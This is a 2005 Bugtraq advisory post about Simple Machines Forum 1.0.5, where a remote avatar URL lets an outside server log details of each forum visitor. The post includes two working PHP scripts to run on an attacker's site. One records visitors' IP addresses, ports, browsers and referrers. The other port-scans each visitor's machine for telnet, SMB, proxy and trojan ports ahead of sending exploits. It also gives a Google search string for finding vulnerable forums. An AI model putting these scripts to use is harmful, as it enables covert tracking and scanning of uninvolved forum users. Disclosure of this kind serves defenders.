[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Simple Machine Forum 1-0-5 (possibly prior versions) user IP
From: retrogod () aliceposta ! it
Date: 2005-08-31 10:37:57
Message-ID: 20050831103757.20457.qmail () securityfocus ! com
[Download RAW message or body]
Simple Machine Forum 1-0-5 (possibly prior versions) user IP address /
information disclosure
software:
site: http://www.simplemachines.org/
information disclosure:
a user can choose an sumbit an avatar url like this:
http://[evil_site]/image.php
where image.php is a file like this:
<?php
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - \
".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
fclose($fp)
?>
When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:
08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT \
5.1)-http://[target]/[path]/[page]-GET--it-/image.php
so an external user can monitor in details the forum activity, user ip addresses, \
have informations on OS and browsers used and so on
the evil script could check for open ports/services on target machines to send
them exploit code or proxies, trojan ports, do some other stuff, just an example:
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>
googledork: "Powered by SMF"
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/smf105.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic